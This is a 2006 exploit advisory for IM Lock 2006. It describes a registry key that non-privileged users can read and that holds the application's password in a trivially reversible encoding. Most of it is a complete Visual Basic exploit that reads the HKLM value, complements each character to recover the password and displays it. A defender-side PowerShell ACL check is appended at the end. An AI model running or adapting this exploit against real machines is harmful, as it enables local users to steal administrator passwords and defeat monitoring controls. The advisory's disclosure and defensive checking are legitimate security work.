IM Lock Insecure Registry Permission (Exploit)
Source: shadock.secubox.com  Author: fRoGGz  Published: 2006-03-09

Summary
IM Lock is security auditing and management software that controls and blocks access to instant messaging and peer-to-peer services that can infect computers with viruses.

An encrypted password is stored in the registry, in a key that is readable by non-privileged users on the system. By decoding the password, a malicious user could gain access to the config panel. As the exploit code below shows, the stored value is the per-character complement of the password (255 minus each character code), so decoding it requires no key.

Credit:
The information has been provided by fRoGGz.

Details
Exploit:
' ############################################################################
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz
' Versions: Home Edition, Enterprise & Professional
' Application: IM Lock 2006
' Distributor : Comvigo, Inc.
' Link: http://www.comvigo.com
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.
'
' Discovered & Coded by fRoGGz
' Credits to: SecuBox Labs - shadock.secubox.com
'
' ############################################################################

Option Explicit

Private Const ERROR_SUCCESS As Long = 0&
Private Const REG_SZ As Long = 1&

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _
    (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _
    (ByVal hKey As Long, _
    ByVal lpValueName As String, _
    ByVal lpReserved As Long, _
    lpType As Long, _
    lpData As Any, _
    lpcbData As Long) As Long

Dim i As Integer
Dim GetCrypt As String, Decrypt As String

' Reads a REG_SZ value; returns "" when the key or value is missing.
Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String
    Dim keyhand As Long
    Dim lResult As Long
    Dim lValueType As Long
    Dim strBuf As String
    Dim lDataBufSize As Long
    Dim intZeroPos As Integer

    If RegOpenKey(hKey, strPath, keyhand) <> ERROR_SUCCESS Then Exit Function

    ' First call with a null buffer returns the value type and the required size.
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)

    If lResult = ERROR_SUCCESS And lValueType = REG_SZ Then
        strBuf = String(lDataBufSize, " ")
        lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal strBuf, lDataBufSize)
        If lResult = ERROR_SUCCESS Then
            ' Trim at the terminating NUL.
            intZeroPos = InStr(strBuf, Chr$(0))
            If intZeroPos > 0 Then
                GrabBDR = Left$(strBuf, intZeroPos - 1)
            End If
        End If
    End If

    ' Close the handle that was opened, not the predefined root key.
    RegCloseKey keyhand
End Function

Private Sub Form_Load()
    ' &H80000002 = HKEY_LOCAL_MACHINE
    GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc")
    If GetCrypt <> "" Then
        ' Each stored character is the complement (255 - code) of the password character.
        For i = 1 To Len(GetCrypt)
            Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))
        Next
        MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _
            vbOKOnly, "Secubox Labs - Recovery"
    Else
        MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?"
    End If
    End
End Sub
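
A defender-side check for the condition described in the Summary, added here as an example (not part of the original advisory or the vendor's code): it lists the allow ACEs that let broad, non-administrative groups read values under the key the exploit queries. The WOW6432Node path is an assumption for 32-bit installs on 64-bit Windows; the registry path itself is the one from the exploit.

```powershell
# Added example: list which broad principals may read the key from the advisory.
$paths = @(
    'HKLM:\SOFTWARE\Microsoft\SvcHst\msnvs',              # path queried by the exploit above
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\SvcHst\msnvs'   # assumption: 32-bit view on 64-bit Windows
)

# Well-known SIDs of broad, non-administrative principals (locale-independent).
$broadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# Rights that allow reading a value. ACLs may store generic rights instead of
# registry-specific ones, so both forms are checked.
$queryValues = [int][System.Security.AccessControl.RegistryRights]::QueryValues
$genericRead = [int]::MinValue   # 0x80000000, GENERIC_READ
$genericAll  = 0x10000000        # GENERIC_ALL
$readMask    = $queryValues -bor $genericRead -bor $genericAll

foreach ($path in $paths) {
    if (-not (Test-Path -Path $path)) {
        Write-Warning "${path}: key not present"
        continue
    }
    $acl = Get-Acl -Path $path
    # Ask for SIDs rather than translated account names.
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($rule in $rules) {
        $sid  = $rule.IdentityReference.Value
        $mask = [int]$rule.RegistryRights
        # First-pass listing: Allow ACEs only, Deny ACEs are not evaluated here.
        if ($rule.AccessControlType -eq 'Allow' -and
            $broadSids.ContainsKey($sid) -and
            ($mask -band $readMask) -ne 0) {
            [pscustomobject]@{
                Key       = $path
                Principal = $broadSids[$sid]
                Rights    = $rule.RegistryRights
                Inherited = $rule.IsInherited
            }
        }
    }
}
```

Keys under HKLM\SOFTWARE inherit read access for BUILTIN\Users by default, so an inherited hit means the application never restricted the key; a secret stored there needs both a tightened ACL and real encryption rather than a reversible encoding.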




 